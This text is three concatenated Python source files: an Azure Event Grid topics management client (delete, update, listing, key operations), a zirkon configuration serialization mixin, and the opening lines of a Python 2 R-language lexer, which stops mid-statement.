resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
@distributed_trace
def begin_delete(
self,
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Delete a topic.
Delete existing topic.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
topic_name=topic_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
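    # Deletion follows the same LRO pattern (sketch with placeholder names):
    #
    #     client.topics.begin_delete('my-resource-group', 'my-topic').result()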
def _update_initial(
self,
resource_group_name, # type: str
topic_name, # type: str
topic_update_parameters, # type: "_models.TopicUpdateParameters"
**kwargs # type: Any
):
# type: (...) -> Optional["_models.Topic"]
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.Topic"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(topic_update_parameters, 'TopicUpdateParameters')
request = build_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
content_type=content_type,
json=_json,
template_url=self._update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 201:
deserialized = self._deserialize('Topic', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
@distributed_trace
def begin_update(
self,
resource_group_name, # type: str
topic_name, # type: str
topic_update_parameters, # type: "_models.TopicUpdateParameters"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.Topic"]
"""Update a topic.
Asynchronously updates a topic with the specified parameters.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:param topic_update_parameters: Topic update information.
:type topic_update_parameters: ~azure.mgmt.eventgrid.models.TopicUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either Topic or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.eventgrid.models.Topic]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Topic"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_initial(
resource_group_name=resource_group_name,
topic_name=topic_name,
topic_update_parameters=topic_update_parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('Topic', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
@distributed_trace
def list_by_subscription(
self,
filter=None, # type: Optional[str]
top=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.TopicsListResult"]
"""List topics under an Azure subscription.
List all the topics under an Azure subscription.
:param filter: The query used to filter the search results using OData syntax. Filtering is
        permitted on the 'name' property only and with a limited number of OData operations. These
operations are: the 'contains' function as well as the following logical operations: not, and,
or, eq (for equal), and ne (for not equal). No arithmetic operations are supported. The
following is a valid filter example: $filter=contains(namE, 'PATTERN') and name ne 'PATTERN-1'.
The following is not a valid filter example: $filter=location eq 'westus'.
:type filter: str
:param top: The number of results to return per page for the list operation. Valid range for
top parameter is 1 to 100. If not specified, the default number of results to be returned is 20
items per page.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator-like instance of either TopicsListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.eventgrid.models.TopicsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopicsListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
template_url=self.list_by_subscription.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("TopicsListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.EventGrid/topics'} # type: ignore
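    # A minimal usage sketch, not part of the generated code (the client and
    # names below are illustrative): the returned ItemPaged is lazy, fetching
    # each page and following its next_link only as the loop consumes it.
    #
    #     for topic in client.topics.list_by_subscription(top=20):
    #         print(topic.name)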
@distributed_trace
def list_by_resource_group(
self,
resource_group_name, # type: str
filter=None, # type: Optional[str]
top=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.TopicsListResult"]
"""List topics under a resource group.
List all the topics under a resource group.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param filter: The query used to filter the search results using OData syntax. Filtering is
        permitted on the 'name' property only and with a limited number of OData operations. These
operations are: the 'contains' function as well as the following logical operations: not, and,
or, eq (for equal), and ne (for not equal). No arithmetic operations are supported. The
following is a valid filter example: $filter=contains(namE, 'PATTERN') and name ne 'PATTERN-1'.
The following is not a valid filter example: $filter=location eq 'westus'.
:type filter: str
:param top: The number of results to return per page for the list operation. Valid range for
top parameter is 1 to 100. If not specified, the default number of results to be returned is 20
items per page.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator-like instance of either TopicsListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.eventgrid.models.TopicsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopicsListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
filter=filter,
top=top,
template_url=self.list_by_resource_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_resource_group_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
filter=filter,
top=top,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("TopicsListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics'} # type: ignore
@distributed_trace
def list_shared_access_keys(
self,
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.TopicSharedAccessKeys"
"""List keys for a topic.
List the two keys used to publish to a topic.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TopicSharedAccessKeys, or the result of cls(response)
:rtype: ~azure.mgmt.eventgrid.models.TopicSharedAccessKeys
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopicSharedAccessKeys"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_shared_access_keys_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
template_url=self.list_shared_access_keys.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('TopicSharedAccessKeys', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_shared_access_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}/listKeys'} # type: ignore
def _regenerate_key_initial(
self,
resource_group_name, # type: str
topic_name, # type: str
regenerate_key_request, # type: "_models.TopicRegenerateKeyRequest"
**kwargs # type: Any
):
# type: (...) -> "_models.TopicSharedAccessKeys"
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopicSharedAccessKeys"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(regenerate_key_request, 'TopicRegenerateKeyRequest')
request = build_regenerate_key_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
content_type=content_type,
json=_json,
template_url=self._regenerate_key_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('TopicSharedAccessKeys', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_regenerate_key_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}/regenerateKey'} # type: ignore
@distributed_trace
def begin_regenerate_key(
self,
resource_group_name, # type: str
topic_name, # type: str
regenerate_key_request, # type: "_models.TopicRegenerateKeyRequest"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.TopicSharedAccessKeys"]
"""Regenerate key for a topic.
Regenerate a shared access key for a topic.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:param regenerate_key_request: Request body to regenerate key.
:type regenerate_key_request: ~azure.mgmt.eventgrid.models.TopicRegenerateKeyRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either TopicSharedAccessKeys or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.eventgrid.models.TopicSharedAccessKeys]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopicSharedAccessKeys"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._regenerate_key_initial(
resource_group_name=resource_group_name,
topic_name=topic_name,
regenerate_key_request=regenerate_key_request,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('TopicSharedAccessKeys', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_regenerate_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}/regenerateKey'} # type: ignore
@distributed_trace
def list_event_types(
self,
resource_group_name, # type: str
provider_namespace, # type: str
resource_type_name, # type: str
resource_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.EventTypesListResult"]
"""List topic event types.
List event types for a topic.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param provider_namespace: Namespace of the provider of the topic.
:type provider_namespace: str
:param resource_type_name: Name of the topic type.
:type resource_type_name: str
:param resource_name: Name of the topic.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator-like instance of either EventTypesListResult or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.eventgrid.models.EventTypesListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.EventTypesListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_event_types_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
provider_namespace=provider_namespace,
resource_type_name=resource_type_name,
resource_name=resource_name,
template_url=self.list_event_types.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_event_types_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
provider_namespace=provider_namespace,
resource_type_name=resource_type_name,
resource_name=resource_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("EventTypesListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_event_types.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{providerNamespace}/{resourceTypeName}/{resourceName}/providers/Microsoft.EventGrid/eventTypes'} # type: ignore
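if __name__ == '__main__':
    # A minimal usage sketch, not part of the generated module. It assumes
    # valid Azure credentials plus an existing resource group 'my-rg' and
    # topic 'my-topic' (all names are illustrative), and that this operations
    # class is exposed as the 'topics' attribute of EventGridManagementClient.
    from azure.identity import DefaultAzureCredential
    from azure.mgmt.eventgrid import EventGridManagementClient
    from azure.mgmt.eventgrid.models import TopicUpdateParameters

    client = EventGridManagementClient(DefaultAzureCredential(),
                                       '<subscription-id>')
    # begin_update returns an LROPoller; result() blocks until the
    # long-running operation completes and returns the deserialized Topic.
    poller = client.topics.begin_update(
        'my-rg', 'my-topic', TopicUpdateParameters(tags={'env': 'dev'}))
    topic = poller.result()
    # list_shared_access_keys is a plain synchronous POST returning both keys.
    keys = client.topics.list_shared_access_keys('my-rg', 'my-topic')
    print(topic.name, keys.key1 is not None)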
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2013 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""\
Implementation of the ConfigBase mixin class, adding serialization methods.
"""
from .errors import ConfigValidationError
from .filetype import get_filetype, get_default_fmt
from .macros import MContext
from .section import Section
from .toolbox import serializer
__author__ = "Simone Campagna"
__copyright__ = 'Copyright (c) 2015 Simone Campagna'
__license__ = 'Apache License Version 2.0'
__all__ = [
'ConfigBase',
]
class ConfigBase(Section):
r""" Config base class; adds to Section serialization/deserialization methods.
Parameters
----------
init: |Mapping|, optional
some initialization content
dictionary: |Mapping|, optional
the internal dictionary
schema: |Schema|, optional
the validation schema
    validate: bool, optional
        self-validate during initialization (defaults to True)
    macros: bool, optional
        enables macros (defaults to True)
    \*\*section_options:
        keyword arguments to be passed to the Section constructor
"""
def __init__(self, init=None, *, dictionary=None, schema=None, validate=True,
macros=True, **section_options):
super().__init__(dictionary=dictionary, init=init,
macros=macros, **section_options)
self._schema = None
self.set_schema(schema=schema, validate=validate)
@property
def schema(self):
"""Gets the schema attribute"""
return self._schema
@schema.setter
def schema(self, schema):
"""Sets the schema attribute"""
return self.set_schema(schema)
def set_schema(self, schema, *, validate=True):
"""Sets the validation schema
Parameters
----------
schema: |Schema|
the schema to be used for self-validation
(can be None to disable self-validation)
validate: bool
execute self-validation now (defaults to True)
Raises
------
|OptionValidationError|
option validation error
"""
self._schema = schema
if validate:
self.self_validate(raise_on_error=True)
def self_validate(self, raise_on_error=False):
"""Validate the config itself using the 'schema' attribute.
Parameters
----------
raise_on_error: bool, optional
            raise an exception at the very first validation error (defaults to False)
Raises
------
|OptionValidationError|
option validation error
Returns
-------
|Validation|
the validation object containing all the found errors.
            If 'raise_on_error' is True, it contains at most one error.
"""
if self._schema is not None:
validation = self._schema.validate(self, raise_on_error=False)
if raise_on_error and validation:
raise ConfigValidationError(validation=validation)
else:
return validation
@classmethod
def get_serializer(cls, fmt):
"""Returns a serializer for the required format.
Parameters
----------
fmt: str
a valid format name
Raises
------
ValueError
unsupported serialization format
Returns
-------
zirkon.toolbox.serializer.Serializer
the serializer instance.
"""
serializer_class = serializer.Serializer.get_class(fmt)
if serializer_class is None:
raise ValueError("serialization format {} not available [{}]".format(
fmt,
'|'.join(registered_class.class_tag() for registered_class in serializer.Serializer.classes()),
))
return serializer_class(scope=cls.__scope__)
@classmethod
def _get_fmt(cls, filename, fmt=None):
"""Get the file format
Parameters
----------
filename: str
a file name
fmt: str, optional
a valid format name (defaults to None); when fmt is None,
it will be deduced from filename, if possible
Returns
-------
str
the file format
Raises
------
ValueError
if fmt is missing and it cannot be deduced
"""
if fmt is None:
filetype = get_filetype(filename, config_classes=cls)
if filetype is None:
raise ValueError("file {}: format cannot be deduced".format(filename))
fmt = filetype.fmt
return fmt
def to_string(self, fmt=None, *, defaults=False, evaluate=False):
"""Serializes to string according to 'format'.
Parameters
----------
fmt: str, optional
a valid format name (defaults to None)
defaults: bool, optional
if True, serialize also default values (defaults to False)
evaluate: bool, optional
if True evaluate macros (defaults to False)
Raises
------
|OptionValidationError|
option validation error
Returns
-------
str
the serialization string
"""
if fmt is None:
fmt = get_default_fmt()
self.self_validate(raise_on_error=True)
serializer_instance = self.get_serializer(fmt)
obj = self.as_dict(defaults=defaults, evaluate=evaluate)
return serializer_instance.to_string(obj)
def to_stream(self, stream, fmt=None, *, defaults=False, evaluate=False):
"""Serializes to file stream 'stream' according to 'format'.
Parameters
----------
stream: file
a file stream
fmt: str, optional
a valid format name (defaults to None)
defaults: bool, optional
if True, serialize also default values (defaults to False)
evaluate: bool, optional
if True evaluate macros (defaults to False)
Raises
------
|OptionValidationError|
option validation error
ValueError
if fmt is missing and it cannot be deduced from filename
"""
if fmt is None:
fmt = get_default_fmt()
self.self_validate(raise_on_error=True)
serializer_instance = self.get_serializer(fmt)
obj = self.as_dict(defaults=defaults, evaluate=evaluate)
serializer_instance.to_stream(obj, stream)
def to_file(self, filename, fmt=None, *, defaults=False, evaluate=False):
"""Serializes to file 'filename' according to 'format'.
Parameters
----------
filename: str
a file name
fmt: str, optional
a valid format name (defaults to None); when fmt is None,
it will be deduced from filename, if possible
defaults: bool, optional
if True, serialize also default values (defaults to False)
evaluate: bool, optional
if True evaluate macros (defaults to False)
Raises
------
|OptionValidationError|
option validation error
"""
fmt = self._get_fmt(filename=filename, fmt=fmt)
self.self_validate(raise_on_error=True)
serializer_instance = self.get_serializer(fmt)
obj = self.as_dict(defaults=defaults, evaluate=evaluate)
serializer_instance.to_file(obj, filename)
    def dump(self, stream=None, fmt=None, *, defaults=False, evaluate=False):
        """Dumps the config to 'stream' according to 'fmt'; the config is
           self-validated first (parameters are as in to_stream).
        """
        if fmt is None:
            fmt = get_default_fmt()
        self.self_validate(raise_on_error=True)
        super().dump(stream=stream, fmt=fmt, defaults=defaults, evaluate=evaluate)
@classmethod
def from_file(cls, filename, fmt=None, *,
dictionary=None, schema=None, validate=True, **config_args):
r"""Deserializes from file 'filename' according to 'format'.
Parameters
----------
filename: str
a file name
fmt: str, optional
a valid format name (defaults to None); when fmt is None,
it will be deduced from filename, if possible
dictionary: mapping, optional
the internal dictionary (defaults to None)
schema: Schema, optional
the validation schema (defaults to None)
validate: bool, optional
            if True, self-validate on construction (defaults to True)
\*\*config_args
keyword arguments to be passed to the constructor
Returns
-------
cls
the deserialized object
Raises
------
ValueError
if fmt is missing and it cannot be deduced from filename
"""
fmt = cls._get_fmt(filename=filename, fmt=fmt)
serializer_instance = cls.get_serializer(fmt)
content = serializer_instance.from_file(filename)
with MContext.referring(filename):
instance = cls(init=content, dictionary=dictionary, **config_args)
instance.set_filename(filename)
instance.set_schema(schema=schema, validate=validate)
return instance
@classmethod
def from_stream(cls, stream, fmt=None, *,
dictionary=None, filename=None,
schema=None, validate=True, **config_args):
r"""Deserializes from file stream 'stream' according to 'format'.
Parameters
----------
stream: file
a file stream
fmt: str, optional
a valid format name (defaults to None)
dictionary: mapping, optional
the internal dictionary (defaults to None)
schema: Schema, optional
the validation schema (defaults to None)
validate: bool, optional
            if True, self-validate on construction (defaults to True)
\*\*config_args
keyword arguments to be passed to the constructor
Returns
-------
cls
the deserialized object
"""
if fmt is None:
fmt = get_default_fmt()
serializer_instance = cls.get_serializer(fmt)
content = serializer_instance.from_stream(stream, filename=filename)
with MContext.referring(filename):
instance = cls(init=content, dictionary=dictionary, **config_args)
instance.set_filename(filename)
instance.set_schema(schema=schema, validate=validate)
return instance
@classmethod
def from_string(cls, string, fmt=None, *,
dictionary=None, filename=None, schema=None, validate=True, **config_args):
r"""Deserializes from string 'string' according to 'format'.
Parameters
----------
string: str
a serialization string
fmt: str, optional
a valid format name (defaults to None)
dictionary: mapping, optional
the internal dictionary (defaults to None)
schema: Schema, optional
the validation schema (defaults to None)
validate: bool, optional
            if True, self-validate on construction (defaults to True)
\*\*config_args
keyword arguments to be passed to the constructor
Returns
-------
cls
the deserialized object
"""
if fmt is None:
fmt = get_default_fmt()
serializer_instance = cls.get_serializer(fmt)
content = serializer_instance.from_string(string, filename=filename)
with MContext.referring(filename):
instance = cls(init=content, dictionary=dictionary, **config_args)
instance.set_filename(filename)
instance.set_schema(schema=schema, validate=validate)
return instance
def read(self, filename, fmt=None, merge=False):
"""Reads from file 'filename' according to 'format'. The initial content is cleared.
Parameters
----------
filename: str
a file name
fmt: str, optional
a valid format name (defaults to None); when fmt is None,
it will be deduced from filename, if possible
merge: bool, optional
if True merge old and new content
Raises
------
|OptionValidationError|
option validation error
ValueError
if fmt is missing and it cannot be deduced
"""
fmt = self._get_fmt(filename=filename, fmt=fmt)
if not merge:
self.clear()
with MContext.referring(filename):
serializer_instance = self.get_serializer(fmt)
content = serializer_instance.from_file(filename)
self.merge(content)
self.set_filename(filename)
self.self_validate(raise_on_error=True)
def write(self, filename, fmt=None):
"""Writes to file 'filename' according to 'format'.
Parameters
----------
filename: str
a file name
fmt: str, optional
a valid format name (defaults to None); when fmt is None,
it will be deduced from filename, if possible
Raises
------
|OptionValidationError|
option validation error
ValueError
if fmt is missing and it cannot be deduced
"""
self.to_file(filename, fmt)
def copy(self):
"""Returns a deep copy of the config.
"""
instance = self.__class__(super().copy())
instance.set_filename(self._filename)
return instance
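# A round-trip usage sketch (illustrative, not part of this module). It
# assumes a concrete ConfigBase subclass exported by the package, e.g.
# zirkon.config.Config, and the default serialization format:
#
#     from zirkon.config import Config
#
#     config = Config()
#     config['x'] = 10
#     config['sub'] = {'y': 'hello'}
#     text = config.to_string()         # serializes with the default fmt
#     clone = Config.from_string(text)  # deserializes back into a Config
#     assert clone == config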
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""R-specific portions (to wit, lexer and parser) of the R formatter.
Much of the code for the R lexer is structured along the lines of the C code
in the R system implementation itself, and the PLY grammar used here is adapted
from the YACC grammar used in the R parser. For details, see:
https://svn.r-project.org/R/trunk/src/main/gram.y
"""
import collections
import cStringIO as StringIO
import os
import ply.yacc as yacc
import base
import rparsetab
class _RStream(object):
"""A character stream with facilities for the R lexer."""
def __init__(self, stream_input):
if not (isinstance(stream_input, basestring) or
isinstance(stream_input, file)):
